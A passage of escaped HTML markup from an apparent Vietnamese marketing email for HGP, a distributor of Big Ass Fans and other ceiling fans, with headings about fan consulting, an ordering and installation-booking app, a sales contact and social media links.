(!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #1b2a2f\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #1b2a2f;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h3 class=\\\"v-text-align\\\" style=\\\"margin: 0px; color: #f1c40f; line-height: 140%; text-align: left; word-wrap: break-word; font-family: \'Open Sans\',sans-serif; font-size: 20px; font-weight: 400; \\\">THI\\u1ebeT K\\u1ebe T\\u01af V\\u1ea4N GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M M\\u00c1T<\\/h3>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-family: \'Lato\',sans-serif; font-size: 17px; font-weight: 700; color: #2dc26b; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng, c\\u00f4ng nghi\\u1ec7p, v\\u0103n ph\\u00f2ng th\\u01b0\\u01a1ng m\\u1ea1i, nh\\u00e0 \\u1edf cao c\\u1ea5p.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">L\\u01afU L\\u01af\\u1ee2NG KH\\u00d4NG KH\\u00cd, HI\\u1ec6U QU\\u1ea2 V\\u00c0 TR\\u1ea2I NGHI\\u1ec6M T\\u1ed0T H\\u01a0N CHO GIA \\u0110\\u00ccNH HO\\u1eb6C C\\u01a0 QUAN L\\u00c0M VI\\u1ec6C<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 30px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #f5f5f5; line-height: 160%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\">V\\u1edbi kinh nghi\\u1ec7m h\\u01a1n 10 n\\u0103m cung c\\u1ea5p l\\u1eafp \\u0111\\u1eb7t qu\\u1ea1t tr\\u1ea7n. Hi\\u1ec7n nay HGP (H\\u1ed3 Gia Ph\\u00e1t) l\\u00e0 \\u0111\\u1ea1i \\u0111i\\u1ec7n ph\\u00e2n ph\\u1ed1i \\u0111\\u1ed9c quy\\u1ec1n cho th\\u01b0\\u01a1ng hi\\u1ec7u Big Ass Fans, Haiku - th\\u01b0\\u01a1ng hi\\u1ec7u qu\\u1ea1t h\\u00e0ng \\u0111\\u1ea7u c\\u1ee7a Hoa K\\u1ef3 v\\u00e0 Tổ chức đào tạo WIT (China), WildMill (India) - d\\u00f2ng qu\\u1ea1t tr\\u1ea7n trang tr\\u00ed c\\u1ed5 \\u0111i\\u1ec3n - \\u0111a d\\u1ea1ng ki\\u1ec3u d\\u00e1ng &amp; k\\u00edch th\\u01b0\\u1edbc.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h3 class=\\\"v-text-align\\\" style=\\\"margin: 0px; line-height: 140%; text-align: left; word-wrap: break-word; font-size: 18px; \\\">\\u1ee8ng d\\u1ee5ng Mua H\\u00e0ng\\u00a0<br \\/>\\u0110\\u1eb7t l\\u1ecbch l\\u1eafp \\u0111\\u1eb7t - b\\u1ea3o tr\\u00ec<\\/h3>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-family: \'Source Sans Pro\',sans-serif; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <ul style=\\\"list-style-type: square;\\\">\\r\\n<li style=\\\"line-height: 19.6px;\\\">B\\u1ea1n c\\u1ea7n \\u0111\\u1eb7t h\\u00e0ng qu\\u1ea1t tr\\u1ea7n nhanh ?<\\/li>\\r\\n<li style=\\\"line-height: 19.6px;\\\">B\\u1ea1n c\\u1ea7n s\\u1eed d\\u1ee5ng l\\u1eafp \\u0111\\u1eb7t qu\\u1ea1t tr\\u1ea7n chuy\\u00ean nghi\\u1ec7p?<\\/li>\\r\\n<li style=\\\"line-height: 19.6px;\\\">B\\u1ea1n c\\u1ea7n d\\u1ecbch v\\u1ee5 b\\u1ea3o d\\u01b0\\u1ee1ng, b\\u1ea3o tr\\u00ec qu\\u1ea1t tr\\u1ea7n?<\\/li>\\r\\n<\\/ul>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:40px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678764058271-br-code-app.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 220px;\\\" width=\\\"220\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #000000\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #000000;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:37px; v-text-anchor:middle; width:306px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#3AAEE0\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #3AAEE0; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">Li\\u00ean h\\u1ec7 B\\u00e1n H\\u00e0ng: 0962731418 (Ms.Loan)<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <div style=\\\"display: table; max-width:184px;\\\">\\r\\n  <!--[if (mso)|(IE)]><table width=\\\"184\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"border-collapse:collapse;\\\" align=\\\"center\\\"><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:184px;\\\"><tr><![endif]-->\\r\\n  \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 5px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 5px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/www.facebook.com\\/hogiaphatvn\\\" title=\\\"Facebook\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/facebook.png\\\" alt=\\\"Facebook\\\" title=\\\"Facebook\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 5px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 5px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/www.linkedin.com\\/company\\/hogiaphat\\/\\\" title=\\\"LinkedIn\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/linkedin.png\\\" alt=\\\"LinkedIn\\\" title=\\\"LinkedIn\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 5px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 5px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/twitter.com\\/hgpco\\\" title=\\\"Twitter\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/twitter.png\\\" alt=\\\"Twitter\\\" title=\\\"Twitter\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 5px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 5px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/www.youtube.com\\/channel\\/UCKlFoDwgsjdlMD9gxwQYPVw\\\" title=\\\"YouTube\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/youtube.png\\\" alt=\\\"YouTube\\\" title=\\\"YouTube\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 0px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/www.instagram.com\\/quatcaocap\\/\\\" title=\\\"Instagram\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/instagram.png\\\" alt=\\\"Instagram\\\" 